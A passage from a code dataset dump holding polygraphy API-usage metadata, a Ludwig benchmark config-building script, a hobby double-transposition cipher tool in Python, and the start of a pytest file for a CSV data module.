"polygraphy.logger.G_LOGGER", "line_number": 43, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 44, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 44, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.super_verbose", "line_number": 45, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 45, "usage_type": "name"}, {"api_name": "os.kill", "line_number": 51, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 51, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "polygraphy.mod.export", "line_number": 18, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 18, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 61, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 61, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.backtrace", "line_number": 65, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 65, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 66, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 66, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 72, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 72, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 73, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 73, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 76, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 76, "usage_type": "name"}, {"api_name": "polygraphy.config.INTERNAL_CORRECTNESS_CHECKS", "line_number": 87, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 87, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 88, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 88, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 145, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 145, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 146, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 146, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 148, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 148, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 150, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 150, "usage_type": "name"}, {"api_name": "polygraphy.mod.autoinstall", "line_number": 155, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 155, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 162, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 172, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 182, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 193, "usage_type": "call"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 205, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 205, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 251, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 251, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 252, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 252, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 253, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 253, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 276, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 276, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbosity", "line_number": 278, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 278, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 284, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 284, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 287, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 287, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 309, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 309, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 312, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 312, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 322, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 322, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 337, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 337, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 340, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 340, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 353, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 353, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 358, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 358, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 361, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 361, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 375, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config.get_flag", "line_number": 390, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 390, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 394, "usage_type": "call"}, {"api_name": "polygraphy.config.engine_capability", "line_number": 395, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 395, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 398, "usage_type": "call"}, {"api_name": "polygraphy.config.get_memory_pool_limit", "line_number": 400, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 400, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 408, "usage_type": "call"}, {"api_name": "polygraphy.config.get_tactic_sources", "line_number": 409, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 409, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 414, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 414, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 414, "usage_type": "attribute"}, {"api_name": "contextlib.suppress", "line_number": 417, "usage_type": "call"}, {"api_name": "polygraphy.config.profiling_verbosity", "line_number": 418, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 418, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 421, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 421, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 422, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 422, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 425, "usage_type": "call"}, {"api_name": "polygraphy.config.get_preview_feature", "line_number": 426, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 426, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 431, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 431, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 432, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 432, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 439, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 439, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 480, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 480, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 482, "usage_type": "call"}, {"api_name": "polygraphy.util.is_shape_dynamic", "line_number": 490, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 490, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 497, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 497, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 501, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 501, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 520, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 520, "usage_type": "name"}, {"api_name": "polygraphy.config.get_calibration_profile", "line_number": 529, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 529, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 531, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 531, "usage_type": "name"}, {"api_name": "polygraphy.exception.PolygraphyException", "line_number": 538, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 539, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 539, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 543, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 543, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 562, "usage_type": "call"}, {"api_name": "polygraphy.util.default", "line_number": 578, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 578, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 579, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 579, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 615, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 615, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 626, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 626, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 646, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 646, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 658, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 663, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 664, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 673, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 687, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 687, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 689, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 689, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 694, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 694, "usage_type": "name"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 695, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 695, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 704, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 704, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 705, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 705, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 706, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 706, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 710, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 710, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 716, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 716, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 729, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 729, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 731, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 740, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 740, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 742, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 751, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 751, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 768, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 768, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 772, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 772, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 781, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 781, "usage_type": "name"}]} +{"seq_id": "42742917788", "text": "import logging\nimport os\nimport pdb\n\nfrom copy import deepcopy\n\nimport yaml\n\nimport globals\nfrom globals import *\nfrom lbt.utils.experiment_utils import load_yaml\n\ntemplate = load_yaml(CONFIG_TEMPLATE_FILE)\ndataset_metadata = load_yaml(DATASET_METADATA_FILE)\nhyperopt_config = load_yaml(HYPEROPT_CONFIG_FILE)\n\n\ndef insert_global_vars(config):\n \"\"\" replace global variable placeholders with respective values \"\"\"\n for key, value in config.items():\n if type(value) != dict and value in vars(globals):\n config[key] = getattr(globals, value)\n\n\ndef build_config_files():\n config_fps = {}\n config = deepcopy(template)\n\n encoder_hyperopt_vals = []\n # select relevant encoders\n for encoder_filename in globals.ENCODER_FILE_LIST:\n with open(os.path.join(ENCODER_CONFIG_DIR, encoder_filename)) as f:\n encoder_hyperopt_params = yaml.load(f, Loader=yaml.SafeLoader)\n encoder_hyperopt_vals.append(encoder_hyperopt_params)\n\n # select relevant datasets\n selected_datasets = {}\n for dataset_name in globals.DATASETS_LIST:\n if dataset_name in dataset_metadata.keys():\n selected_datasets[dataset_name] = dataset_metadata[dataset_name]\n else:\n raise ValueError(\n \"The dataset you provided is not available.\"\n \"Please see list of available datasets here: \"\n \"python experiment_drivery.py --h\"\n )\n\n config[\"hyperopt\"].update(hyperopt_config)\n\n for dataset, metadata in selected_datasets.items():\n # each dataset will have a model specific config file\n config_fps[dataset] = []\n\n for idx, input_feature_name in enumerate(metadata[\"input_features\"]):\n ipt_feat = deepcopy(config[\"input_features\"][0])\n ipt_feat[\"name\"] = input_feature_name[\"name\"]\n ipt_feat[\"type\"] = input_feature_name[\"type\"]\n if idx == 0:\n config[\"input_features\"] = [ipt_feat]\n else:\n config[\"input_features\"].append(ipt_feat)\n for idx, output_feature_info in enumerate(metadata[\"output_features\"]):\n out_feat = deepcopy(config[\"output_features\"][0])\n out_feat[\"name\"] = output_feature_info[\"name\"]\n out_feat[\"type\"] = output_feature_info[\"type\"]\n if idx == 0:\n config[\"output_features\"] = [out_feat]\n else:\n config[\"output_features\"].append(out_feat)\n\n if len(metadata[\"output_features\"]) > 1:\n config[\"hyperopt\"][\"output_feature\"] = \"combined\"\n else:\n config[\"hyperopt\"][\"output_feature\"] = metadata[\"output_features\"][\n 0\n ][\"name\"]\n\n input_feature_names = metadata[\"input_features\"]\n output_feature_names = metadata[\"output_features\"]\n\n for encoder_hyperopt_params in encoder_hyperopt_vals:\n curr_config = deepcopy(config)\n encoder_name = encoder_hyperopt_params[\"parameters\"][\n \"input_features.name.encoder\"\n ]\n\n # update input and output parameters (not preprocessing)\n for idx in range(len(curr_config[\"input_features\"])):\n curr_config[\"input_features\"][idx].update(\n encoder_hyperopt_params[\"input_features\"][idx]\n )\n insert_global_vars(curr_config[\"input_features\"][idx])\n\n for idx in range(len(curr_config[\"output_features\"])):\n if \"output_features\" in encoder_hyperopt_params.keys():\n curr_config[\"output_features\"][idx].update(\n encoder_hyperopt_params[\"output_features\"][idx]\n )\n insert_global_vars(curr_config[\"output_features\"][idx])\n\n # handle encoder specific preprocessing\n for idx in range(len(curr_config[\"input_features\"])):\n try:\n preprocessing = curr_config[\"input_features\"][idx][\n \"preprocessing\"\n ]\n for key, _ in preprocessing.items():\n preprocessing[key] = encoder_hyperopt_params[\n \"input_features\"\n ][idx][\"preprocessing\"][key]\n\n except:\n pass #no preprocessing param\n # handle encoder specific training params\n if \"training\" in encoder_hyperopt_params.keys():\n curr_config[\"training\"].update(\n encoder_hyperopt_params[\"training\"]\n )\n\n def input_or_output_feature(param_key):\n if param_key.split(\".\")[0] == \"input_features\":\n return True\n return False\n\n # handle encoder specific hyperopt\n input_encoder_hyperopt_params = {\n \"parameters\": {\n input_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for input_feat in input_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and input_or_output_feature(key)\n }\n }\n\n # handle encoder specific hyperopt\n output_encoder_hyperopt_params = {\n \"parameters\": {\n output_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for output_feat in output_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and not input_or_output_feature(key)\n }\n }\n\n ds_encoder_hyperopt_params = {\n \"parameters\": {\n **output_encoder_hyperopt_params[\"parameters\"],\n **input_encoder_hyperopt_params[\"parameters\"],\n }\n }\n curr_config[\"input_features\"][0][\"encoder\"] = encoder_name\n\n # populate hyperopt parameters w/encoder specific settings\n curr_config[\"hyperopt\"].update(\n {\n \"parameters\": {\n **ds_encoder_hyperopt_params[\"parameters\"],\n **hyperopt_config[\"parameters\"],\n }\n }\n )\n\n config_fp = os.path.join(\n EXPERIMENT_CONFIGS_DIR, f\"config_{dataset}_{encoder_name}.yaml\"\n )\n with open(config_fp, \"w\") as f:\n yaml.dump(curr_config, f)\n\n config_fps[dataset].append(config_fp)\n\n return config_fps\n", "repo_name": "HazyResearch/ludwig-benchmarking-toolkit", "sub_path": "lbt/build_def_files.py", "file_name": "build_def_files.py", "file_ext": "py", "file_size_in_byte": 6799, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 13, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 14, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 15, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 27, "usage_type": "call"}, {"api_name": "globals.ENCODER_FILE_LIST", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 33, "usage_type": "call"}, {"api_name": "yaml.SafeLoader", "line_number": 33, "usage_type": "attribute"}, {"api_name": "globals.DATASETS_LIST", "line_number": 38, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 55, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "70111771687", "text": "\"\"\"\r\nThe python code here implements a cipher that I am calling Randomness Hardened Double Transposition(RHDT)\r\n\r\n---LICENSE---\r\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with this program. If not, see .\r\nCopyright cryptoam 2023\r\n\"\"\"\r\nimport secrets\r\n\r\ndef main():\r\n print(\"This is the RHDT tool\")\r\n print(\"All inputs must be uppercase letters with no symbols or spaces\")\r\n print(\"Program is liable to crash or malfunction if invalid input is provided\")\r\n exit_enable=False\r\n while exit_enable==False:\r\n mode=input(\"Encrypt(E) or Decrypt(D) or Exit(EXIT)?\\n--->\")\r\n if mode==\"E\":\r\n encrypt_mode()\r\n elif mode==\"D\":\r\n decrypt_mode()\r\n elif mode==\"EXIT\":\r\n exit_enable=True\r\n else:\r\n print(\"Invalid entry, try again\")\r\n input(\"Press enter to end program\")\r\n\r\ndef encrypt_mode():\r\n print(\"In encryption mode now\")\r\n plaintext=input(\"What is the plaintext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Plaintext is: \"+plaintext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=preprocess_forward(plaintext)\r\n ciphertext=double_transpose_encrypt(preprocessed_plaintext, key1, key2)\r\n print(\"Ciphertext is: \"+ciphertext)\r\n\r\ndef decrypt_mode():\r\n print(\"In decryption mode now\")\r\n ciphertext=input(\"What is the ciphertext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Ciphertext is: \"+ciphertext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=double_transpose_decrypt(ciphertext, key1, key2)\r\n plaintext=preprocess_backward(preprocessed_plaintext)\r\n print(\"Plaintext is: \"+plaintext)\r\n\r\ndef preprocess_forward(plaintext):\r\n # Convert the plaintext into a stream of 0-25\r\n plaintext_stream=[]\r\n for char in plaintext:\r\n num=ord(char)-ord(\"A\")\r\n plaintext_stream.append(num)\r\n # Obtain an actually random(read: unpredictable to adversary) stream of 0-25\r\n random_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n random_num=secrets.randbelow(26)\r\n random_stream.append(random_num)\r\n # Now start crossing the streams\r\n # :P\r\n preprocessed_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n char_num=plaintext_stream[i]\r\n random_num=random_stream[i]\r\n a=((2*char_num)+random_num)%26\r\n b=(char_num+random_num)%26\r\n preprocessed_stream.append(a)\r\n preprocessed_stream.append(b)\r\n # Convert the numbers in the preprocessed stream back into letters\r\n preprocessed_plaintext=\"\"\r\n for num in preprocessed_stream:\r\n char=chr(num+ord(\"A\"))\r\n preprocessed_plaintext=preprocessed_plaintext+char\r\n return(preprocessed_plaintext)\r\n\r\ndef preprocess_backward(preprocessed_plaintext):\r\n # Convert the preprocessed plaintext into a stream of 0-25\r\n number_stream=[]\r\n for char in preprocessed_plaintext:\r\n num=ord(char)-ord(\"A\")\r\n number_stream.append(num)\r\n # Convert the stream of numbers into a stream of tuples (a,b)\r\n tuple_stream=[]\r\n for i in range(0, len(number_stream), 2):\r\n tuple_stream.append((number_stream[i],number_stream[i+1]))\r\n # Now we process each tuple to recover the plaintext number\r\n plaintext_stream=[]\r\n for tup in tuple_stream:\r\n a=tup[0]\r\n b=tup[1]\r\n c=a-b\r\n if c<0:\r\n plaintext_num=c+26\r\n else:\r\n plaintext_num=c\r\n plaintext_stream.append(plaintext_num)\r\n # Finally recover the plaintext from the stream of 0-25\r\n plaintext=\"\"\r\n for num in plaintext_stream:\r\n char=chr(num+ord(\"A\"))\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef transpose_encrypt(plaintext, key):\r\n columns = len(key)\r\n rows = (len(plaintext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the plaintext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Fill the grid with the plaintext\r\n index = 0\r\n for row in range(rows):\r\n for col in range(columns):\r\n if index < len(plaintext):\r\n grid[row][col] = plaintext[index]\r\n index=index+1\r\n else:\r\n grid[row][col]=\"$\"\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Create a new grid\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Fill in the new grid according the the sorted collum\r\n for row in range(rows):\r\n for col in range(columns):\r\n new_grid[row][col]=grid[row][sorted_columns[col]]\r\n # Extract the ciphertext from the new grid using the sorted columns \r\n ciphertext = \"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass\r\n else:\r\n ciphertext=ciphertext+char\r\n return (ciphertext)\r\n\r\ndef transpose_decrypt(ciphertext, key):\r\n columns = len(key)\r\n rows = (len(ciphertext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the ciphertext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Fill in the grid for the full rows\r\n index = 0\r\n for row in range(rows-1):\r\n for col in range(columns):\r\n if index < len(ciphertext):\r\n grid[row][col] = ciphertext[index]\r\n index=index+1\r\n # We need to be careful now\r\n # The last row is not garunteed to be full, must now perform a check\r\n a=(len(ciphertext)%columns)\r\n if a==0:\r\n # We do not need to worry, we can just carry on\r\n # The length of the ciphertext is a multiple of the key, there will not be mismatched column lengths\r\n for col in range(columns):\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n else:\r\n # Turns out we do need to worry, column lengths will be mismatched\r\n for col in range(columns):\r\n current_collum_index=sorted_columns[col]\r\n if current_collum_index>=a:\r\n #We are writing to a column that does not have a character, pad it instead\r\n grid[rows-1][col]=\"$\"\r\n else:\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Copy characters over to the new grid but this time with the collumns in the right place\r\n index=0\r\n for col in sorted_columns:\r\n for row in range(rows):\r\n char=grid[row][index]\r\n new_grid[row][col]=char\r\n index=index+1\r\n # Extract the plaintext from the grid\r\n plaintext=\"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass #padding, ignore and move on to the next one\r\n else:\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef double_transpose_encrypt(plaintext, key1, key2):\r\n partial_encrypt=transpose_encrypt(plaintext, key1)\r\n ciphertext=transpose_encrypt(partial_encrypt, key2)\r\n return(ciphertext)\r\n\r\ndef double_transpose_decrypt(ciphertext, key1, key2):\r\n partial_decrypt=transpose_decrypt(ciphertext, key2)\r\n plaintext=transpose_decrypt(partial_decrypt, key1)\r\n return(plaintext)\r\n\r\nif __name__==\"__main__\":\r\n main()", "repo_name": "cryptoam322/RHDT-cipher", "sub_path": "RDHT-cipher_final.py", "file_name": "RDHT-cipher_final.py", "file_ext": "py", "file_size_in_byte": 8587, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "secrets.randbelow", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "24775054719", "text": "import pytest\nimport csv\nimport mock\nfrom unittest.mock import patch\nimport os\nfrom ..DataFile import Metadata, DataFile, Relation, _convert_string_to_number\n\nMANUFACTURER_VALUES = {\"Toyota\": 2, \"Volkswagon\": 1, \"Ferrari\": 1}\nMODEL_VALUES = {\"Camry\": 1, \"GTI\": 1, \"Corolla\": 1, \"Dino 246 GT\": 1}\nCOLOR_VALUES = {\"Gray\": 1, \"White\": 1, \"Black\": 1, \"Red\": 1}\nCOST_QUANT_VALUES = [\"$15,000\", \"$20,000\", \"$10,000\"]\nCOST_QUAL_VALUES = {\"N.A.\": 1}\nMPG_VALUES = [25.4, 23.2, 28.2, 18.2]\nEMPTY_VALUES = {}\n'''\nReturn a very simple, fake CSV file for testing\n'''\n@pytest.fixture()\ndef simple_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",\"25.4\",\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",\"23.2\",\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",\"28.2\",\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",\"18.2\",N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\ndef create_simple_csv(file_name=\"../test_data/simple.csv\"):\n data = [\n ['Manufacturer','Model','Color','Miles','MPG','Cost'],\n ['Toyota','Camry','Gray','75,000','25.4','$15,000'],\n ['Volkswagon','GTI','White','75,000','23.2','$20,000'],\n 